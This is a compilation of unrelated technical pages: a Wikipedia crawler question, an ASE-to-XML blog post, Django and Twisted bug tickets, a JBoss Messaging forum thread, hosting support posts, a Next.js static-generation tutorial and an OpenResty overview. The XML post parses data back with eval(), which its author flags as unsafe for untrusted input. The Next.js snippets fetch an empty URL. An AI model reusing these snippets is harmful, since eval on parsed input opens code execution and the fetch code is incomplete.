- Check if the goal article is on the current page: if it is, then return path_crawler_took+goal_article
- Check if any of the articles that link to the goal are on the current page. If one of them is, return path_crawler_took+intermediate_article+goal
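The search step above can be sketched as follows; get_links is a stand-in for the crawler's link scraper (its name and signature are assumptions for illustration):

```python
from collections import deque

def bfs_path(start, goal, get_links):
    """Breadth-first search over article titles; get_links(title)
    returns the titles linked from that page."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in get_links(path[-1]):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None  # goal unreachable from start

# toy link graph standing in for Wikipedia
graph = {"A": ["B", "C"], "B": ["D"], "C": [], "D": []}
bfs_path("A", "D", lambda t: graph.get(t, []))  # ['A', 'B', 'D']
```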
I was having a problem where the program would return a path, but the path wouldn't really link to the goal.
def get_all_links(source):
    source = source[:source.find('Edit section: References')]
    source = source[:source.find('id="See_also"')]
    links = findall('\/wiki\/[^\(?:/|"|\#)]+', source)
    return list(set([''+link for link in links if is_good(link) and link]))

links_to_goal = get_all_links(goal)
I realized that I was getting the links to the goal by scraping all of the links off of the goal page, but wiki/ links are unidirectional: Just because the goal links to a page doesn't mean that page links to the goal.
How can I get a list of articles that link to the goal?
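One option (my suggestion, not something from the question) is the public MediaWiki API, whose backlinks list is exactly this reverse lookup. A sketch that only builds the request URL, leaving the actual fetch to the crawler:

```python
from urllib.parse import urlencode

def backlinks_url(title, limit=500):
    # MediaWiki's "backlinks" list returns pages that link *to* a title,
    # the reverse of scraping the links *from* the goal page
    params = {
        "action": "query",
        "list": "backlinks",
        "bltitle": title,
        "bllimit": limit,
        "blnamespace": 0,  # restrict to the article namespace
        "format": "json",
    }
    return "https://en.wikipedia.org/w/api.php?" + urlencode(params)

backlinks_url("Python (programming language)")
```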
Source: https://www.howtobuildsoftware.com/index.php/how-do/pTR/python-python-27-web-crawler-get-all-links-from-page-on-wikipedia
Serializing an Atoms object in xml
Posted June 28, 2015 at 12:26 PM | categories: xml, ase, python | tags: | View Comments
I have a future need to serialize an Atoms object from ase as XML. I would use json usually, but I want to use a program that will index xml. I have previously used pyxser for this, but I recall it being difficult to install, and it does not pip install on my Mac. So, here we look at xmlwitch which does pip install ;). This package does some serious magic with context managers.
One thing I am not sure about here is the best way to represent numbers and lists/arrays. I am using repr here, and assuming you would want to read this back in to Python where this could simply be eval'ed. Some alternatives would be to convert them to lists, or save them as arrays of xml elements.
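For instance, the convert-to-lists alternative could look like this; a hypothetical sketch for a single attribute, not part of the post's code:

```python
import json

# store a position as a JSON list in the element text instead of a
# repr()'d numpy array, so reading it back does not require eval()
position = [0.0, 0.0, 0.119262]
text = json.dumps(position)
restored = json.loads(text)
restored == position  # True
```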
from ase.data.g2 import data
from ase.structure import molecule
import xmlwitch

atoms = molecule('H2O')

def serialize_atoms(atoms):
    'Return an xml string of an ATOMS object.'
    xml = xmlwitch.Builder(version='1.0', encoding='utf-8')
    with xml.atoms():
        for atom in atoms:
            with xml.atom(index=repr(atom.index)):
                xml.symbol(atom.symbol)
                xml.position(repr(atom.position))
                xml.magmom(repr(atom.magmom))
                xml.mass(repr(atom.mass))
                xml.momentum(repr(atom.momentum))
                xml.number(repr(atom.number))
        xml.cell(repr(atoms.cell))
        xml.pbc(repr(atoms.pbc))
    return xml

atoms_xml = serialize_atoms(atoms)
print atoms_xml

with open('atoms.xml', 'w') as f:
    f.write(str(atoms_xml))
<?xml version="1.0" encoding="utf-8"?>
<atoms>
  <atom index="0">
    <symbol>O</symbol>
    <position>array([ 0. , 0. , 0.119262])</position>
    <magmom>0.0</magmom>
    <mass>15.9994</mass>
    <momentum>array([ 0., 0., 0.])</momentum>
    <number>8</number>
  </atom>
  <atom index="1">
    <symbol>H</symbol>
    <position>array([ 0. , 0.763239, -0.477047])</position>
    <magmom>0.0</magmom>
    <mass>1.0079400000000001</mass>
    <momentum>array([ 0., 0., 0.])</momentum>
    <number>1</number>
  </atom>
  <atom index="2">
    <symbol>H</symbol>
    <position>array([ 0. , -0.763239, -0.477047])</position>
    <magmom>0.0</magmom>
    <mass>1.0079400000000001</mass>
    <momentum>array([ 0., 0., 0.])</momentum>
    <number>1</number>
  </atom>
  <cell>array([[ 1., 0., 0.], [ 0., 1., 0.], [ 0., 0., 1.]])</cell>
  <pbc>array([False, False, False], dtype=bool)</pbc>
</atoms>
Now, we can try reading that file. I am going to use emacs-lisp here for fun, and compute the formula.
(let* ((xml (car (xml-parse-file "atoms.xml")))
       (atoms (xml-get-children xml 'atom))
       (symbol-elements (mapcar (lambda (atom)
                                  (car (xml-get-children atom 'symbol)))
                                atoms))
       (symbols (mapcar (lambda (x) (car (xml-node-children x)))
                        symbol-elements)))
  (mapconcat (lambda (c)
               (format "%s%s" (car c) (if (= 1 (cdr c)) "" (cdr c))))
             (loop for sym in (-uniq symbols)
                   collect (cons sym (-count (lambda (x) (string= x sym))
                                             symbols)))
             ""))
OH2
Here is a (misleadingly) concise way to do this in Python. It is so short thanks to there being a Counter that does what we want, and some pretty nice list comprehension!
import xml.etree.ElementTree as ET
from collections import Counter

with open('atoms.xml') as f:
    xml = ET.fromstring(f.read())

counts = Counter([el.text for el in xml.findall('atom/symbol')])
print ''.join(['{0}{1}'.format(a, b) if b > 1 else a
               for a, b in counts.iteritems()])
H2O
And finally a test on reading a unit cell.
import xml.etree.ElementTree as ET
from numpy import array

with open('atoms.xml') as f:
    xml = ET.fromstring(f.read())

print eval(xml.find('cell').text)
[[ 1.  0.  0.]
 [ 0.  1.  0.]
 [ 0.  0.  1.]]
That seems to work but, yeah, you won't want to read untrusted xml with that! See . It might be better (although not necessarily more secure) to use pickle or some other serialization strategy for this.
Copyright (C) 2015 by John Kitchin. See the License for information about copying.
Org-mode version = 8.2.10
Source: http://kitchingroup.cheme.cmu.edu/blog/category/ase/
Opened 3 years ago
Last modified 22 months ago
#21729 new Cleanup/optimization
DecimalField.to_python() fails on values with invalid unicode start byte
Description
Consider the following example:
from django.forms import Form
from django.forms.fields import DecimalField

class MyForm(Form):
    field = DecimalField()

data = {'field': '1\xac23'}
form = MyForm(data)

# This will raise a DjangoUnicodeDecodeError instead of returning False
# and having a validation error on the 'field'.
form.is_valid()
I noticed this on Django 1.5, but it looks like it also reproes on Django 1.6.
Upon investigation, it looks like smart_str was used in previous versions. Nowadays, it looks like smart_text can throw a DjangoUnicodeDecodeError in these cases. I believe this exception should be caught in the to_python code and go through the same codepath as when an exception is raised in the "Decimal(value)" code block.
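A framework-free sketch of the proposed fix, with illustrative stand-ins for Django's ValidationError and Decimal coercion (the names and the float() stand-in are assumptions, not Django's actual implementation): treat a decode failure the same as any other invalid input.

```python
# hypothetical stand-in for django.core.exceptions.ValidationError
class ValidationError(Exception):
    pass

def to_python(value):
    """Coerce user input to a number, turning *any* bad input,
    including undecodable bytes, into a ValidationError."""
    try:
        text = value.decode("utf-8") if isinstance(value, bytes) else value
        return float(text)  # stand-in for Decimal(value)
    except (UnicodeDecodeError, ValueError):
        raise ValidationError("Enter a number.")

to_python("1.5")  # 1.5
```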
Change History (4)
comment:1 Changed 3 years ago by
comment:2 Changed 22 months ago by
I think that with current Django code, a field should never receive such byte streams.
Not quite sure what this quote is referring to, possibly how requests are processed and handled before going into a view?
The Form class makes no rules about where the data must come from.
I am hitting this issue when building an API using a Form's CharField that takes the user's data from a CSV file.

They sent me a string that ends in a partial UTF-8 character (only the first byte, and not the second), and the form raises DjangoUnicodeDecodeError on is_valid.
Pretty much exactly what the original example demonstrates.
I argue that there is precedent to catch this exception (possibly in the Field class), since the job of a Form is to take any user input data and produce a list of errors. And when the user did send invalid data, the Form crashed instead of producing an error.
Here is (the relevant part of) a stack trace:
File "/home/my_user/my_project/apps/my_app/parsers.py", line 222, in parse_feed
    if not form.is_valid():
File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 129, in is_valid
    return self.is_bound and not bool(self.errors)
File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 121, in errors
    self.full_clean()
File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 273, in full_clean
    self._clean_fields()
File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 288, in _clean_fields
    value = field.clean(value)
File "/usr/local/lib/python2.6/dist-packages/django/forms/fields.py", line 148, in clean
    value = self.to_python(value)
File "/usr/local/lib/python2.6/dist-packages/django/forms/fields.py", line 208, in to_python
    return smart_text(value)
File "/usr/local/lib/python2.6/dist-packages/django/utils/encoding.py", line 73, in smart_text
    return force_text(s, encoding, strings_only, errors)
File "/usr/local/lib/python2.6/dist-packages/django/utils/encoding.py", line 119, in force_text
    raise DjangoUnicodeDecodeError(s, *e.args)
django.utils.encoding.DjangoUnicodeDecodeError: 'utf8' codec can't decode byte 0xc3 in position 29: unexpected end of data. You passed in 'The Chesterfield brand Stor h\xc3' (<type 'str'>)
And here is my current workaround:
class MyForm(forms.Form):
    def _clean_fields(self, *args, **kwargs):
        try:
            return super(MyForm, self)._clean_fields(*args, **kwargs)
        except DjangoUnicodeDecodeError:
            msg = ("The data you provided is not encoded properly, "
                   "please ensure you have valid UTF-8.")
            self._errors['__all__'] = self.error_class([msg])
comment:3 Changed 22 months ago by
comment:4 Changed 22 months ago by
Thanks for your input. I think that your use case makes sense. Note that CharField is also subject to this issue, and other fields should be investigated.
I think that with current Django code, a field should never receive such byte streams. Could you provide us with a plausible use case where such invalid data can reach form data?
Messaging Cluster issue — Daniel Bevenius, Feb 5, 2008 3:59 AM
Hi,
we are using JBM 1.4.0.SP3 configured in a cluster. We have a four node cluster and use custom correlation ids to correlate messages.
Our messaging clients post a message to a queue and wait a specified amount of time for a message to appear on a response queue with the correlation id they expect.
Now the problem we are experiencing is that when several concurrent calls are made, sometimes we are not able to retrieve the message from the clustered queue. We have verified that the message is in fact there, with the correct correlation id.
We have tried to simulate this behaviour with the test class below.
public class DestinationPeeker {

    private static final String QUEUE_NAME = "queue/clusteredQueue";
    private static final String JNDI_SERVER = "hostname:1100";
    private static final String CORRELATION_ID = "12345";
    private static String messageSelector = "JMSCorrelationID = '" + CORRELATION_ID + "'";

    @Test
    public void peek() throws NamingException, JMSException {
        Context ctx = getContext();
        Queue queue = (Queue) ctx.lookup( QUEUE_NAME );
        QueueConnectionFactory factory = (QueueConnectionFactory) ctx.lookup( "ConnectionFactory" );
        QueueConnection cnn = factory.createQueueConnection();
        QueueSession session = cnn.createQueueSession( false, QueueSession.AUTO_ACKNOWLEDGE );
        QueueBrowser browser = session.createBrowser( queue, messageSelector );
        String messageSelector = browser.getMessageSelector();
        Enumeration enumeration = browser.getEnumeration();
        while ( enumeration.hasMoreElements() ) {
            Message jmsMsg = (Message) enumeration.nextElement();
            System.out.print( "JMSMessageID : " + jmsMsg.getJMSMessageID() );
            System.out.print( ", JMSCorrelelationID : " + jmsMsg.getJMSCorrelationID() );
            System.out.print( ", JMSExpiration : " + jmsMsg.getJMSExpiration() );
            System.out.println("");
        }
        browser.close();
        session.close();
        cnn.close();
    }

    @Test
    @Ignore
    public void putMessageOnQueue() throws NamingException, JMSException {
        Context ctx = getContext();
        Queue queue = (Queue) ctx.lookup( QUEUE_NAME );
        QueueConnectionFactory factory = ( QueueConnectionFactory ) ctx.lookup( "/ClusteredConnectionFactory" );
        QueueConnection cnn = factory.createQueueConnection();
        QueueSession session = cnn.createQueueSession( false, QueueSession.AUTO_ACKNOWLEDGE );
        MessageProducer producer = session.createProducer( queue );
        TextMessage msg = session.createTextMessage();
        msg.setJMSCorrelationID( CORRELATION_ID );
        producer.send( msg );
        producer.close();
        session.close();
        cnn.close();
        ctx.close();
    }

    private Context getContext() throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put( Context.INITIAL_CONTEXT_FACTORY, "org.jnp.interfaces.NamingContextFactory" );
        env.put( Context.URL_PKG_PREFIXES, "org.jboss.naming" );
        env.put( Context.PROVIDER_URL, JNDI_SERVER );
        return new InitialContext(env);
    }
}
Note that we are using a QueueBrowser to peek at the queue. I've tried this by consuming from the queue and seen the same behaviour.
When I run the above (having run once with only executing putMessageOnQueue()) I sometimes get a message back and sometimes don't. It's not deterministic.
Is this a valid way to verify the functionality of clustering with message correlation ids?
Has anyone seen this sort of behaviour before?
Any comments or suggestions are welcome.
Thanks,
/Daniel
1. Re: Messaging Cluster issue — Tim Fox, Feb 5, 2008 4:08 AM (in response to Daniel Bevenius)
Can you explain your topology in more detail - i.e., where are the clients that put messages on the queue and where are the clients that remove messages from the queue? (It's important to know what node they're on).
Also can you post your message consumer code? Thanks
2. Re: Messaging Cluster issue — Daniel Bevenius, Feb 5, 2008 4:32 AM (in response to Daniel Bevenius)
Hi Tim,
thanks for your quick response!
The clients that put messages on the queue are Web Services that exist on two nodes in our messaging cluster.
Their responsibility is to send the SOAP message to a queue that our ESB servers listen to.
The ESB service performs its actions, and one of these is to send a response message to a response queue.
It's a little difficult for me to post the actual code. But the "test" class in my previous post can simulate the behaviour. This can be done with a two node messaging cluster.
Are there any tests in the messaging project that I could run against our configuration to verify that we have not incorrectly configured something? The system has been running in production for several months without any warnings or errors. We upgraded to 1.4.0.SP3 right before Christmas.
Thanks,
Daniel
3. Re: Messaging Cluster issue — Tim Fox, Feb 5, 2008 4:38 AM (in response to Daniel Bevenius)
So you have a clustered response queue, and, say two consumers on it on different nodes....
A response message gets posted to the queue. Clearly the response message is destined for a specific consumer, but if you have two consumers on the queue, you can't be sure it gets to the "right" consumer (how would JBM know what is the "right" consumer?).
Clustering will make sure it gets to one of the consumers, but not necessarily the one you expect. Am I missing something here, or misunderstanding what you are trying to achieve?
4. Re: Messaging Cluster issue — Daniel Bevenius, Feb 5, 2008 5:49 AM (in response to Daniel Bevenius)
Yep, that is correct. The response queue is clustered and we have two consumers listening to that queue.
I'm sorry but I forgot to mention that these consumers are using a message selector (like the example code below). They are using the correlation id to make sure that they only take response messages that correlate to the message they have sent.
I might have misunderstood this but I thought that if I publish a message to a clustered queue and then use a message selector to receive messages from the queue, I would get back the message regardless of where the message physically exists in the cluster.
Does this make sense?
Regards,
Daniel
5. Re: Messaging Cluster issue — Tim Fox, Feb 6, 2008 5:51 AM (in response to Daniel Bevenius)
In most cases, allowing selectors on a JMS queue is an anti-pattern since it can cause the queue to be scanned frequently - i.e. give poor performance.
Also JMS selectors only work on the *local* queue - i.e. each clustered queue is made up of n local partial queues - one on each node. If your consumer has a selector then that does not determine whether or not messages are pulled to or from that node.
This can result in messages being pulled from one node to another, where they won't be consumed because the selector doesn't match.
Making message redistribution cluster aware would be extremely difficult. Think about it. Imagine messages are pulled to one node based on the selectors on that node, then the consumer changes on that node, and another one starts on another node that matches. We would have to maintain a global view of what selectors were on each node and messages would be shifted en-masse back and forth every time a selector changed!
If you want to do clustered request-response, then you could either
a) Use a *topic* with selectors. (In general, if you ever see yourself using selectors with queues, it's always a good idea to see if you can refactor to use topics.)
b) Use a temporary request/response queue - in this case you don't need selectors since the response queue is only used by you.
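Option (b) can be sketched without JMS at all. Here is a toy Python illustration (standard-library queues standing in for JMS destinations, hypothetical names) of why a per-requester temporary reply queue removes the need for selectors:

```python
import queue
import threading

# Toy model of clustered request/response: one shared request queue,
# and a private (temporary) reply queue per request, so the response
# can only be delivered to the requester -- no selector needed.
request_q = queue.Queue()

def server():
    while True:
        payload, reply_q = request_q.get()
        if payload is None:        # shutdown sentinel
            break
        reply_q.put("response to " + payload)

threading.Thread(target=server, daemon=True).start()

def call(payload, timeout=5):
    reply_q = queue.Queue()        # stands in for a JMS TemporaryQueue
    request_q.put((payload, reply_q))
    return reply_q.get(timeout=timeout)

print(call("msg-1"))
```

In real JMS the same shape is a session.createTemporaryQueue() whose name is sent along in the request's JMSReplyTo header.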
6. Re: Messaging Cluster issue — Daniel Bevenius, Feb 6, 2008 6:07 AM (in response to Daniel Bevenius)
Hi Tim,
thanks for the detailed explanation on this, it is much appreciated!
I'll refactor our code to use temporary queues instead. Is there any performance loss compared to using topics with selectors?
Regards,
Daniel
Posts posted by gasparic
Hello,
I need Python module channels==3.0.4 for Django on Tommy:
Also, I need your help with deploying Django project/app to subdomain chat.codedo.ga
How should I edit .htaccess and dispatch.wsgi files for app to run directly on that subdomain without separate folder?
currently .htaccess:
RewriteEngine On
RewriteBase /
RewriteRule ^(codedoga/dispatch\.wsgi/.*)$ - [L]
RewriteRule ^(.*)$ chat/codedoga/dispatch.wsgi/$1 [QSA,PT,L]
dispatch.wsgi :
"""
WSGI config for chat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
"""
import os, sys
# edit your username below
sys.path.append("/home/gasparic/public_html/chat")
from django.core.wsgi import get_wsgi_application
os.environ['DJANGO_SETTINGS_MODULE'] = 'codedoga.settings'
application = get_wsgi_application()
I'm currently getting 500 Internal server error.
Thank you,
gasparic
Thank you very much
I need help connecting to mySQL database that is on hosting server from my site.
DB connects fine from three different computers and two different sites, but it won't connect from my Django app on my site or using php script on my site, it just gives "Connection timed out"
HelioHost:
user - gasparic
Hostinger MySQL db:
host = 'servername';dbname = 'XXX';username = 'XXXXu';
I added % - any host to allowed hosts to MySQL remote on hPanel on hostinger and I also added address 65.19.143.6 which was shared IP address for my site at the moment.
I made special user for Django so that I can share Django debug report if it will help - I'm willing to send it via email or private message.
Thank you in advance
Johnny and Tommy have different Python modules installed. We just start with nothing and install stuff as people request it. Have you checked your modules against Tommy's installed list? Go through this list and see if anything you're trying to import is missing. If anything is missing let me know and I can install it.
You are right, I need pymysql which is available on Johnny, but not on Tommy.
Can you install it?
Thank you
Hello,
after moving to Tommy, I get this error when trying to access my Django application:
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator at webmaster@dominik.codedo.
link is dominik.codedo.ga/kuhinja210/
heliohost-user: gasparic
It was working on Johnny so I suspect Apache, but could be something else. Please help.
Thank You
Please move to Tommy
User: gasparic
Transaction: 1A760563PR761515C
Thank You
thank you very much
thank you very much
It is working since I added the domain docode.ga. But decode.ga is still primary, which isn't my domain (I don't own it).
I need remote access to Postgres for any IP for users gasparic_db1select, gasparic_db1user and gasparic_db1sudo for my database gasparic_db1
Thank you
Re: So Long and Thanks for all the Fish (in News)
I would also consider SPanel and aaPanel.
Since this is a large community of happy users, I believe everyone would consider helping and contributing, both with their knowledge and financially, to "save" HelioHost and make it even better than it was before.
Thanks guys for everything so far. I really hope that this is not the end.
Opened 12 years ago
Closed 11 years ago
Last modified 11 years ago
#4658 defect closed invalid (invalid)
twisted.internet.gtk2reactor conflicts with subprocess.Popen
Description
I'm using 64-bit Linux, Python 2.6.5, pygtk 2.22.0 and Twisted 10.0.0. When I run the following script, one of the two CPUs goes to 100% after the subprocess returns (after 5 seconds).
#!/usr/bin/python
#import gtk
from twisted.internet import gtk2reactor
gtk2reactor.install()
from twisted.internet import reactor
import subprocess
subprocess.Popen(['sleep', '5'])
#gtk.main()
reactor.run()
If I use gtk.main() instead of reactor.run(), there will be no problem, so I wonder if it is a bug of twisted?
Change History (24)
comment:1 Changed 12 years ago by
comment:2 Changed 12 years ago by
Nor on Linux/64-bit, Python 2.6.5, pygtk 2.17.0, gtk 2.20.1, Twisted 10.0.0
comment:3 Changed 12 years ago by
comment:4 Changed 12 years ago by
The first release of Twisted which claims to be compatible with the subprocess module at all is 10.1. So perhaps this is invalid. Please try with 10.1 or later and report the results. Also, if you still have a problem on 10.1 or later, please add these lines to the beginning of your example and report the extra output:
from twisted.python.log import startLogging
from sys import stdout
startLogging(stdout)
Also, there's #4286, but it should only matter when running on Python 2.5.
comment:5 Changed 12 years ago by
comment:6 Changed 12 years ago by
The same thing happens on 10.1, Ubuntu 10.10 32bit, pygtk 2.21.0, gtk 2.22.0. Here is the log:
2010-10-05 14:45:37+0800 [-] Log opened.
2010-10-05 14:45:37+0800 [-] using set_wakeup_fd
C2010-10-05 14:45:54+0800 [-] Received SIGINT, shutting down.
comment:7 Changed 12 years ago by
I tried to reproduce this in a 32bit Ubuntu 10.04 VM and wasn't able to.
comment:8 Changed 12 years ago by
can't reproduce it on osx 10.5.8 with python2.5 and twisted 10.1 either.
>>> gtk.gtk_version
(2, 14, 8)
>>> gtk.pygtk_version
(2, 15, 0)
comment:9 Changed 12 years ago by
I've reproduced it on Ubuntu 10.10 64-bit on another machine; maybe it's a problem with the newer software versions? I'll try 10.04 later.
comment:10 Changed 12 years ago by
I can't reproduce it on Ubuntu 10.04 on the same machine. I think you should reproduce it on newer pygtk and gtk. Ubuntu 10.10 is on the way.
comment:11 Changed 11 years ago by
comment:12 Changed 11 years ago by
I've just fired the test-case above (rather than the one in #4829) and I can reproduce this 100% on both the latest Fedora (14) and Ubuntu (10.10), and probably most other distros too.
Any suggestions for a workaround would be much appreciated. At the moment I get lots of user complaints of the form: "your application is buggy/crap" because of this.
comment:13 Changed 11 years ago by
Here's an strace of the demo after it starts hogging the CPU:
poll([{fd=5, events=POLLIN}, {fd=8, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 4, 29) = 1 ([{fd=7, revents=POLLIN}])
read(7, 0, 1) = -1 EFAULT (Bad address)
gettimeofday({1296137620, 466729}, NULL) = 0
read(8, 0x8fcc438, 4096) = -1 EAGAIN (Resource temporarily unavailable)
gettimeofday({1296137620, 466835}, NULL) = 0
This happens in a perpetual loop.
The EFAULT on fd 7 looks pretty suspect, but it's also not clear why the process keeps trying to read from fd 8.
So, I don't really know what's going on here. It still looks like a gtk2 bug to me, though.
comment:14 Changed 11 years ago by
I've collected similar straces before.
Aren't those fds the stdin and/or stdout of the subprocess? And since that's terminated... there's nothing there, right?
If I wrap Popen, wouldn't it be possible to force the reactor (gtk in this case) to stop polling on those (closed?) fds somehow?
comment:15 Changed 11 years ago by
I don't think so. The way Popen is used in this example, the child stdio is inherited directly from the parent. It doesn't pass through the parent process at all, and nothing in the reactor monitors it.
7 is created by a pipe call. 8 is created by a socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_TCP) call and then connected to localhost port 6010... ie, X11.
comment:16 Changed 11 years ago by
If it helps at all, reactor.run(installSignalHandlers=False) appears to eliminate the CPU issue. Of course, this breaks reactor.spawnProcess, but if you're using Popen then it's possible you don't care much about that.
This workaround suggests it's an interaction between Twisted's signal handling and glib/gtk/pygtk's signal handling that causes the problem.
comment:17 Changed 11 years ago by
Actually, I am using reactor.spawnProcess... so that doesn't help me :(
FYI: I've created a bug on gnome's bugzilla: bug 640738 (which also points back here)
comment:18 Changed 11 years ago by
I've just tried and it looks like my problem is finally solved! (no CPU usage) - simply by using your suggestion:
reactor.run(installSignalHandlers=False) - thank you so much!
In what way does it break reactor.spawnProcess?
All the calls to reactor.spawnProcess seem to work as expected... so far.
I won't be rushing a bugfix release out just yet, but this looks promising.
comment:19 Changed 11 years ago by
In what way does it break reactor.spawnProcess?
Without a SIGCHLD handler installed, Twisted won't notice when child processes exit, and won't reap them. They'll remain zombies and the ProcessProtocol.processEnded and ProcessProtocol.processExited callbacks will never be invoked.
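The reaping that such a handler performs can be illustrated in plain Python (a sketch, not Twisted's actual code): without a handler calling waitpid(), an exited child would linger as a zombie.

```python
import os
import signal
import time

reaped = []

def on_sigchld(signum, frame):
    # Roughly what a SIGCHLD handler must do: reap the exited child
    # so it doesn't linger as a zombie in the process table.
    pid, status = os.waitpid(-1, os.WNOHANG)
    reaped.append(pid)

signal.signal(signal.SIGCHLD, on_sigchld)

child = os.fork()
if child == 0:
    os._exit(0)        # child exits immediately

time.sleep(0.5)        # give the signal time to arrive in the parent
print("reaped:", reaped)
```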
comment:20 Changed 11 years ago by
This code from pygtk probably has something to do with the bug:
#ifdef HAVE_PYSIGNAL_SETWAKEUPFD
    PySignalWatchSource *real_source = (PySignalWatchSource *)source;
    GPollFD *poll_fd = &real_source->fd;
    int data_size = 0;
    if (poll_fd->revents & G_IO_IN)
        data_size = read(poll_fd->fd, 0, 1);
#endif
I don't know of any way that read(poll_fd->fd, 0, 1) could ever do anything except fail with EINVAL. There is also no error checking after this call, so no one ever notices the read fails. This is from pygtk_main_watch_check.
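The suspicious read(poll_fd->fd, 0, 1) call can be reproduced from Python with ctypes (a sketch; Linux behaviour): with data pending on the fd, a NULL buffer makes read() fail with EFAULT, matching the strace above.

```python
import ctypes
import errno
import os

libc = ctypes.CDLL(None, use_errno=True)

r, w = os.pipe()
os.write(w, b"x")                     # make the read end readable first

# Equivalent of pygtk's read(poll_fd->fd, 0, 1): NULL buffer, count 1.
n = libc.read(r, None, 1)
err = ctypes.get_errno()
print(n, errno.errorcode.get(err))
```

Since the return value is never checked in the pygtk source, the fd stays readable and poll() keeps waking up immediately, which is consistent with the busy loop observed.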
comment:21 Changed 11 years ago by
They'll remain zombies
That would be a major problem for me, but strangely enough that is not what I am seeing. When the child terminates, I get a nice:
twisted.internet.error.ProcessDone A process has ended without apparent errors: process finished with exit code 0.
My code is a bit more complex as it extends protocol.ProcessProtocol via a HiddenSpawnedProcess wrapper (to work around the shell window popup issue on win32), but eventually it ends up calling reactor.spawnProcess from the HiddenSpawnedProcess.startProcess override function...
And you're saying that this should not work properly since I run it with reactor.run(installSignalHandlers=False)? But it does.. How odd!
I'll post your findings to gnome.org as I think they should at least comment on that.
comment:22 Changed 11 years ago by
That would be a major problem for me, but strangely enough that is not what I am seeing.
I suppose that means installSignalHandlers=False is broken right now and isn't actually preventing the signal handler from being installed. I don't know what it is doing, then, that it manages to fix this behavior.
comment:23 Changed 11 years ago by
The pygtk patch you posted works for me, so I am closing this bug as invalid since there's nothing wrong with Twisted. (The strange installSignalHandlers=False behaviour is a separate issue.)
Thanks again for everything!
comment:24 Changed 11 years ago by
The upstream bug report has been closed as fixed.
FWIW, this doesn't happen here with Linux/32-bit, Python 2.6.5, pygtk 2.17.0, gtk 2.20.1, Twisted 10.0.0
Contents
What is static site generation?
Just like the word static, it means not changing. 🧘♂️
Benefits include:
- Better SEO 🕶
- Performance 🚀
- Can be hosted in CDN 🌍
- Doesn't need to have JavaScript to run (mostly HTML) ⚙️
- Far fewer things to parse from server to client 🌬
So why do we need a static site?
Let's take the example of a landing page for a company: a landing page doesn't need any dynamic content, such as pulling data from different APIs and showing it per user.
A user who accesses a landing page of a company needs to see what that company is about, its main feature, achievements, etc, which are all static things.
The second example is this blog, this blog is statically generated from markdown files. Its main purpose is to provide information to you. It doesn't change or pull data from different APIs.
Dynamic sites include websites like Facebook, Twitter, etc., which change content according to their users.
So let's dive in! 🏊♀️
Static site generation in nextjs
To make better use of static site generation in Nextjs, let's understand the getStaticProps() function.
Using the getStaticProps() function:
This function is added to a Nextjs page so that it fetches data at build time.
First of all, let's make a simple Nextjs page called todos.js inside our pages folder.
// Todos.js Page
const Todos = () => {
  return <h1>Todos</h1>;
};

export default Todos;
Let's add the getStaticProps() function.
const Todos = () => {
  return <h1>Todos</h1>;
};

export default Todos;

// add getStaticProps() function
export async function getStaticProps() {}
The getStaticProps() function gives props needed for the component Todos to render things when Nextjs builds the page.
Note that we added the async keyword; this is needed so that Nextjs knows to prerender our Todos page at build time.
Let's write some code inside the getStaticProps() function.
const Todos = () => { /* ... */ };

// add getStaticProps() function
export async function getStaticProps() {
  // Get todo list from an API
  // or from anything like a JSON file etc.
  const res = await fetch('');
  const todos = await res.json(); // fetch() returns a Response, so parse it

  return {
    props: { todos },
  };
}
- We can get our todo list data from an API endpoint or anything like JSON file etc.
- We should return the todos array within the props object, like this:
return {
  props: {
    todos,
  },
};
Now let's complete our Todos render code.
const Todos = ({ todos }) => {
  // render code
  return (
    <div>
      <h1>Todos</h1>
      <ul>
        {todos.length > 0 ? todos.map((todo) => <li>{todo}</li>) : "No todos"}
      </ul>
    </div>
  );
};

export default Todos;

// add getStaticProps() function
export async function getStaticProps() {
  // Get todo list from an API
  const res = await fetch("");
  const todos = await res.json(); // parse the Response body into an array

  return {
    props: {
      todos,
    },
  };
}
Let's break down our render logic.
// render code
return (
  <div>
    <h1>Todos</h1>
    <ul>
      {todos.length > 0 ? todos.map((todo) => <li>{todo}</li>) : "No todos"}
    </ul>
  </div>
);
We are just mapping over the todos array we received as a prop and rendering each todo from the array inside an unordered list, using JavaScript's map() function.
The todos prop is returned from the getStaticProps() function.
Now if you inspect element on your webpage, you can see the prerendered markup.
Wonderful! You just made your page static 🤓.
This helps in SEO.
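To see why this works, here is a toy stand-in (hypothetical names, plain Node, no React) for what the framework does at build time: call getStaticProps() once, feed the returned props to the page, and keep the resulting HTML:

```javascript
// Toy model of build-time prerendering. The real Next.js renders React
// components and does far more; this only shows the data flow.
async function getStaticProps() {
  const todos = ["write post", "review PR"]; // stands in for fetched data
  return { props: { todos } };
}

// A page as a plain function of props (instead of a React component).
const Todos = ({ todos }) =>
  `<ul>${todos.map((t) => `<li>${t}</li>`).join("")}</ul>`;

async function prerender(page, getProps) {
  const { props } = await getProps();
  return page(props); // Next.js would write this HTML to the build output
}

prerender(Todos, getStaticProps).then((html) => console.log(html));
```

Because the HTML exists before any request arrives, crawlers and users get the full list markup with no client-side fetching.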
Discussion (4)
Hi, I recently started learning Next and I was a little confused about getStaticProps() but your article helped me. Thanks 😄
Glad it helped you 😀 @Shubh
Wonderful dude, thx
Thanks Ahmed 😀
OpenResty::Spec::Overview - Overview of the OpenResty service platform
OpenResty is a general-purpose RESTful web service platform for web applications. It provides the following important functionalities for a common nontrivial web app:
This section just gives a conceptual overview for the REST API probably with some samples. For detailed spec for the various REST request syntax, see OpenResty::CheatSheet and OpenResty::Spec::REST.
An openresty server typically distributes its data in terms of accounts, especially when the backend is a database cluster. An account is an atomic namespace for other OpenResty first-class objects like models and views. (In the current Pg and PgFarm backends, accounts are actually implemented by Pg schemas.) These objects are shared in the same account and different accounts can have different models, views, actions, and etc. with the same names.
